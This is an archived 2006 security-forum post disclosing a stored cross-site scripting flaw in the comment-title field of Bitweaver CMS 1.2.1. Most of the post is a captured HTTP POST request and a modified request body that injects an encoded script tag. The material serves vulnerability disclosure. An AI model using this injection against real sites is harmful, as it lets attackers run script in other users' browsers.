  | 
        
  | 
   
 
    
        
      
          | 
  
  
  
    
    
        
	  | 
	Menu | 
	  | 
 
 
    
     
     
     
      
       
       
        
         
         
          
           
						 |  
						 Home |  
 |   |  
						 |  
						 Discussions |  
 |   |  
						 |  
						 Tools |  
 |   |  
						 |  
						 Affiliates |  
 |   |  
						 |  
						 Content |  
 |   |  
						 |  
						 Info |  
 |   |    | 
            
          
         | 
       
     
    | 
    
   
   | 
   
 
 | 
   
 
  
    
    
        
	  | 
	User Info | 
	  | 
 
 
    
     
     
     
      
       
       
        
         
         
          
             Membership: 
  Latest: MichaelSnaRe 
  New Today: 0 
  New Yesterday: 0 
  Overall: 9144 
 
  People Online:
 
  Visitors: 95 
  Members: 0 
  Total: 95 
 | 
            
          
         | 
       
     
    | 
    
   
   | 
   
 
 | 
   
 
  
    
    
        
	  | 
	Full disclosure | 
	  | 
 
 
    
 | 
   
 
 | 
  
    
        
	  | 
	 | 
	  | 
 
 
    
        
          
              
                
                    
                      
                          
                            
                            
	
	
		  | 
		 | 
	 
	
		  | 
		IT Security and Insecurity Portal | 
	 
	 
	 | 
 
 
 
	  | 
	Bitweaver CMS 1.2.1 User Comment Title Cross-Site | 
	  | 
 
 
	
	
		 Posted: Sun Mar 05, 2006 7:53 pm | 
		      | 
	   | 
 
	
	
		
		
			
			
				
				| Kiki |  
				| Regular user |  
				 
   |  
				 |  
				| Joined: Nov 13, 2005 |  
				| Posts: 7 |  
				| Location: Italy |  
				  | 
			 
			 
 
  | 
			  | 
		 
		
			  | 
			  | 
		 
		 
 
  | 
		
		
			 	  | Code: | 	 		  
 
Bitweaver CMS 1.2.1 User Comment Title Cross-Site Scripting Vulnerability 
 
 
####################################
 
 
Information of Software: 
 
 
Software: Bitweaver CMS 1.2.1
 
Site: http://www.bitweaver.org
 
Description of software: bitweaver is continually improving it's stability, 
 
usability, flexibility and power. The rate at which this is happening is quite 
 
astonishing and bitweaver has come a long way since it's birth, just over a year ago. 
 
 
####################################
 
 
Bug:
 
 
Bitweaver contains a flaw that allows a remote cross site scripting attack. 
 
The vulnerability is found in the title of registed user comment page and the 
 
user can modify the function POST and insert the XSS code
 
 
- HTTP POST request -
 
 
http://[target]/[patch]/read.php?article_id=7#editcomments
 
POST /articles/read.php?article_id=7 HTTP/1.1
 
Host: http://[target]
 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/
 
plain;q=0.8,image/png,*/*;q=0.5
 
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
 
Accept-Encoding: gzip,deflate
 
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
 
Keep-Alive: 300
 
Connection: keep-alive
 
Referer: http://[target]/articles/read.php?article_id=7
 
Cookie: mod_usertrack=82.56.164.250.1141558144377994; BWSESSION=v5a6krvki42h0puv48dc5coki0; tz_offset=3600; tiki-user-bitweaver=616706c4d6f7bdf68b30893f860cbb2b
 
Content-Type: application/x-www-form-urlencoded
 
Content-Length: 265
 
tk=c67481b438f7be3da147&comments_maxComments=10&comments_
 
style=threaded&comments_sort_mode=commentDate_desc
 
&post_comment_reply_id=&post_comment_id=&comment_title=hacking
 
&comment_data=[your_name_logged]&post_comment_submit=Post
 
 
but we can modify the request POST in this way:
 
 
tk=c67481b438f7be3da147&comments_maxComments=10&comments
 
_style=threaded&comments_sort_mode=commentDate_desc
 
&post_comment_reply_id=&post_comment_id=&comment_title=
 
%3Cscript%3Ealert%28%22lol%22%29%3B%3C%2Fscript%3E&comment
 
_data=[your_name_logged]&post_comment_submit=Post
 
 
---------------------------------------------------------
 
 
Example:
 
 
For this exploit you must be registred at the site.
 
you can insert in the text post an XSS code or you can modify the request in this way:
 
 
tk=c67481b438f7be3da147&comments_maxComments=10&comments
 
_style=threaded&comments_sort_mode=commentDate_desc&
 
post_comment_reply_id=&post_comment_id=&comment_title=[XSS]
 
&comment_data=[your_name_logged]&post_comment_submit=Post
 
 
 
####################################
 
 
Credit:
 
 
Author: Kiki
 
e-mail: federico.sana@alice.it
 
web page: http://kiki91.altervista.org
 
        http://blackzero.netsons.org
 
 
####################################
 
 | 	  
 
 
Original exploit: http://kiki91.altervista.org/exploit/bitweaver_1.2.1_XSS.txt
 
 
Kiki
 
http://kiki91.altervista.org
 
http://blackzero.netsons.org | 
		 
		  | 
	 
	
		 | 
	 
	  | 
 
	 | 
 
 
  |   
	
	www.waraxe.us Forum Index -> Cross-site scripting aka XSS 
	
	
		
			You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum 
		 | 
		
			All times are GMT 
			Page 1 of 1
			 
			
		 | 
	 
	 
	 | 
 
	| 
	 | 
 
 
  
Powered by phpBB © 2001-2008 phpBB Group
 
  
 
 
 | 
                           
                         
                         | 
                     
                    | 
               
              | 
         
       
       | 
   
  | 
 
 
 |